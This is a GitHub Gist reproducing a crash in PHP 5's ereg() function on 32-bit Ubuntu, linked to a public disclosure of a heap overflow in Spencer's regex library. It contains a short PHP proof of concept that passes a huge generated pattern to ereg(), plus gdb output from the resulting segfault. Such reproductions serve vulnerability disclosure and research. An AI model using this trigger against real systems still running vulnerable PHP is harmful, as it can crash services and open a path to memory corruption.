Last active
August 29, 2015 14:15
-
-
Save inaz2/0605f07a22fa14004d1c to your computer and use it in GitHub Desktop.
crash in PHP 5 ereg() function / Full disclosure: heap overflow in H. Spencer’s regex library on 32 bit systems https://guidovranken.wordpress.com/2015/02/04/full-disclosure-heap-overflow-in-h-spencers-regex-library-on-32-bit-systems/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ uname -a | |
| Linux vm-ubuntu32 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux | |
| $ lsb_release -a | |
| No LSB modules are available. | |
| Distributor ID: Ubuntu | |
| Description: Ubuntu 14.04.1 LTS | |
| Release: 14.04 | |
| Codename: trusty | |
| $ php --version | |
| PHP 5.5.9-1ubuntu4.6 (cli) (built: Feb 13 2015 19:18:15) | |
| Copyright (c) 1997-2014 The PHP Group | |
| Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies | |
| with Zend OPcache v7.0.3, Copyright (c) 1999-2014, by Zend Technologies |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ ulimit -c unlimited | |
| $ php5 -f test.php 0x2AAAAAAC | |
| Segmentation fault (core dumped) | |
| $ gdb php5 core | |
| Reading symbols from php5...(no debugging symbols found)...done. | |
| [New LWP 1253] | |
| [Thread debugging using libthread_db enabled] | |
| Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1". | |
| Core was generated by `php5 -f test.php 0x2AAAAAAC'. | |
| Program terminated with signal SIGSEGV, Segmentation fault. | |
| #0 0x080cd919 in ?? () | |
| gdb-peda$ bt | |
| #0 0x080cd919 in ?? () | |
| #1 0x080ce252 in ?? () | |
| #2 0x080cedb8 in php_regcomp () | |
| #3 0x080cb3ce in ?? () | |
| #4 0x080cb8bb in ?? () | |
| #5 0x0841bbd2 in execute_internal () | |
| #6 0x083560c7 in dtrace_execute_internal () | |
| #7 0x0841f6a8 in ?? () | |
| #8 0x08392f57 in execute_ex () | |
| #9 0x08355fbd in dtrace_execute_ex () | |
| #10 0x0841d785 in zend_execute () | |
| #11 0x0836813e in zend_execute_scripts () | |
| #12 0x08303915 in php_execute_script () | |
| #13 0x0842197f in ?? () | |
| #14 0x08099767 in main () | |
| #15 0xb6fbba83 in __libc_start_main (main=0x8099240 <main>, argc=0x4, argv=0xbfad9e64, init=0x842a8f0 <__libc_csu_init>, fini=0x842a960 <__libc_csu_fini>, rtld_fini=0xb774a180 <_dl_fini>, | |
| stack_end=0xbfad9e5c) at libc-start.c:287 | |
| #16 0x080997f2 in _start () | |
| gdb-peda$ x/i $pc | |
| => 0x80cd919: cmp BYTE PTR [edi],0x0 | |
| gdb-peda$ i r | |
| eax 0xe3 0xe3 | |
| ecx 0xe4 0xe4 | |
| edx 0xa531d70 0xa531d70 | |
| ebx 0x88c5000 0x88c5000 | |
| esp 0xbfad64a0 0xbfad64a0 | |
| ebp 0x8000041 0x8000041 | |
| esi 0xbfad6570 0xbfad6570 | |
| edi 0x8000082 0x8000082 | |
| eip 0x80cd919 0x80cd919 | |
| eflags 0x210206 [ PF IF RF ID ] | |
| cs 0x73 0x73 | |
| ss 0x7b 0x7b | |
| ds 0x7b 0x7b | |
| es 0x7b 0x7b | |
| fs 0x0 0x0 | |
| gs 0x33 0x33 | |
| gdb-peda$ quit |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $pattern = str_repeat("A", hexdec($argv[1])); | |
| echo ereg($pattern, "A"); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment